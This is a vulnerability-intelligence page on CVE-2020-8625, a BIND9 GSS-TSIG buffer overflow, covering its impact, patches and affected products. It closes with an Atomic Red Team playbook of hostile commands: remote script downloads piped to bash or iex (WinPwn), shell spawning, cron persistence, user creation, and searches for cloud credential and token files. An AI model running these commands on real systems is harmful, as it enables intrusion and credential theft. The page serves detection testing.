CVE-2020-8625
Overview
This vulnerability is a stack-based buffer overflow in ISC BIND9's GSS-TSIG authentication feature. The flaw arises from improper handling of GSS-TSIG keytab or credential configuration parameters, leading to memory corruption within the DNS server's named process. The affected component is the GSS-TSIG implementation in BIND9 versions spanning from 9.5.0 through various supported preview and development releases.
Vulnerability Description
BIND servers are vulnerable if they are running an affected version and are configured to use GSS-TSIG features. In a configuration which uses BIND's default settings the vulnerable code path is not exposed, but a server can be rendered vulnerable by explicitly setting valid values for the tkey-gssapi-keytab or tkey-gssapi-credentialconfiguration options. Although the default configuration is not vulnerable, GSS-TSIG is frequently used in networks where BIND is integrated with Samba, as well as in mixed-server environments that combine BIND servers with Active Directory domain controllers. The most likely outcome of a successful exploitation of the vulnerability is a crash of the named process. However, remote code execution, while unproven, is theoretically possible. Affects: BIND 9.5.0 -> 9.11.27, 9.12.0 -> 9.16.11, and versions BIND 9.11.3-S1 -> 9.11.27-S1 and 9.16.8-S1 -> 9.16.11-S1 of BIND Supported Preview Edition. Also release versions 9.17.0 -> 9.17.1 of the BIND 9.17 development branch
Impact
An unauthenticated remote attacker can exploit this vulnerability over the network (AV:N/AC:H/PR:N/UI:N) to cause a denial of service by crashing the named process. Although remote code execution remains unproven, the theoretical possibility exists, elevating potential impact. This can disrupt DNS services in environments using GSS-TSIG, particularly those integrated with Samba or Active Directory, affecting network reliability and availability.
Solution
Apply the patches released in vendor advisories such as Debian DSA-4857 and Fedora package updates referenced in their mailing lists. Upgrading ISC BIND9 to fixed versions beyond 9.11.27, 9.16.11, or the corresponding supported preview and development releases is recommended. Detailed patch instructions and version guidance are available at https://www.debian.org/security/2021/dsa-4857 and Fedora package announcement archives.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in certain versions of BIND servers arises from improper handling of GSS-TSIG features when specific configuration options are enabled. While the default settings of BIND do not expose this vulnerability, the risk becomes significant when administrators explicitly set the values for the tkey-gssapi-keytab or tkey-gssapi-credential configuration options. This misconfiguration can lead to a situation where the server is susceptible to attacks that could cause the named process to crash. Although remote code execution has not been conclusively demonstrated, the theoretical possibility raises concerns about the potential for more severe exploitation.
Attack vectors for this vulnerability primarily involve the manipulation of GSS-TSIG settings in environments where BIND is integrated with Samba or Active Directory domain controllers. In such scenarios, an attacker with the ability to influence these configurations could exploit the vulnerability to disrupt DNS services. The exploitation could be executed remotely, making it particularly dangerous in environments with inadequate security controls. Attackers may leverage this vulnerability to conduct denial-of-service attacks, leading to significant downtime and disruption of services that rely on DNS resolution.
The real-world impact of this vulnerability can be substantial, particularly for organizations that rely heavily on BIND for DNS services. A successful exploitation could lead to service outages, resulting in lost revenue and damage to reputation. Furthermore, the potential for remote code execution, although unproven, could allow attackers to gain unauthorized access to sensitive systems, leading to data breaches or further compromise of the network. The business risk is compounded in environments where BIND is critical for operations, as downtime can have cascading effects on various services and applications.
To detect and mitigate this vulnerability, organizations should first assess their BIND configurations to ensure that GSS-TSIG features are not enabled unless absolutely necessary. Regular audits of DNS configurations and adherence to best practices can help identify potential misconfigurations. Additionally, organizations should implement robust monitoring solutions to detect unusual behavior in DNS traffic, which may indicate attempted exploitation. Upgrading to the latest versions of BIND that address this vulnerability is crucial, as it not only patches the issue but also ensures that organizations benefit from other security enhancements and bug fixes.
In conclusion, the vulnerability in BIND servers related to GSS-TSIG features presents a significant risk to organizations that utilize these systems in their network infrastructure. By understanding the technical details, potential attack vectors, and real-world implications, organizations can better prepare their defenses. Proactive measures, including configuration audits, monitoring, and timely updates, are essential in mitigating the risks associated with this vulnerability and ensuring the integrity and availability of DNS services.
CSURFACE threat intelligence has identified a marked escalation in the Exploit Prediction Scoring System (EPSS) score for CVE-2020-8625, which has surged by over 140% to a current value placing it near the 99th percentile. This significant increase, coupled with a sustained upward trend over the past week, indicates growing confidence within adversarial communities regarding the feasibility and potential impact of exploiting this vulnerability. Although no new exploit code or active exploitation campaigns have been detected by our telemetry, the heightened EPSS score suggests that threat actors may be prioritizing CVE-2020-8625 in their operational planning or reconnaissance phases. For defenders, this shift underscores an elevated risk posture, particularly in environments where BIND servers are configured with GSS-TSIG features, as these configurations remain a critical attack vector. Consequently, the threat level associated with this vulnerability should be considered heightened, reflecting an increased likelihood of exploitation attempts in the near term.
Affected Products (23)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Isc | Bind | All |
cpe:2.3:a:isc:bind:*:*:*:*:*:*:*:*
|
|
|
Isc | Bind | All |
cpe:2.3:a:isc:bind:*:*:*:*:*:*:*:*
|
|
|
Isc | Bind | 9.11.3 |
cpe:2.3:a:isc:bind:9.11.3:s1:*:*:supported_preview:*:*:*
|
|
|
Isc | Bind | 9.11.5 |
cpe:2.3:a:isc:bind:9.11.5:s3:*:*:supported_preview:*:*:*
|
|
|
Isc | Bind | 9.11.5 |
cpe:2.3:a:isc:bind:9.11.5:s5:*:*:supported_preview:*:*:*
|
|
|
Isc | Bind | 9.11.6 |
cpe:2.3:a:isc:bind:9.11.6:s1:*:*:supported_preview:*:*:*
|
|
|
Isc | Bind | 9.11.7 |
cpe:2.3:a:isc:bind:9.11.7:s1:*:*:supported_preview:*:*:*
|
|
|
Isc | Bind | 9.11.8 |
cpe:2.3:a:isc:bind:9.11.8:s1:*:*:supported_preview:*:*:*
|
|
|
Isc | Bind | 9.11.21 |
cpe:2.3:a:isc:bind:9.11.21:s1:*:*:supported_preview:*:*:*
|
|
|
Isc | Bind | 9.11.27 |
cpe:2.3:a:isc:bind:9.11.27:s1:*:*:supported_preview:*:*:*
|
|
|
Isc | Bind | 9.16.8 |
cpe:2.3:a:isc:bind:9.16.8:s1:*:*:supported_preview:*:*:*
|
|
|
Isc | Bind | 9.16.11 |
cpe:2.3:a:isc:bind:9.16.11:s1:*:*:supported_preview:*:*:*
|
|
|
Isc | Bind | 9.17.0 |
cpe:2.3:a:isc:bind:9.17.0:*:*:*:*:*:*:*
|
|
|
Isc | Bind | 9.17.1 |
cpe:2.3:a:isc:bind:9.17.1:*:*:*:*:*:*:*
|
|
|
Debian | Debian Linux | 9.0 |
cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*
|
|
|
Debian | Debian Linux | 10.0 |
cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*
|
|
|
Fedoraproject | Fedora | 32 |
cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*
|
|
|
Fedoraproject | Fedora | 33 |
cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*
|
|
|
Fedoraproject | Fedora | 34 |
cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*
|
|
|
Siemens | Sinec Infrastructure Network Services | All |
cpe:2.3:a:siemens:sinec_infrastructure_network_services:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.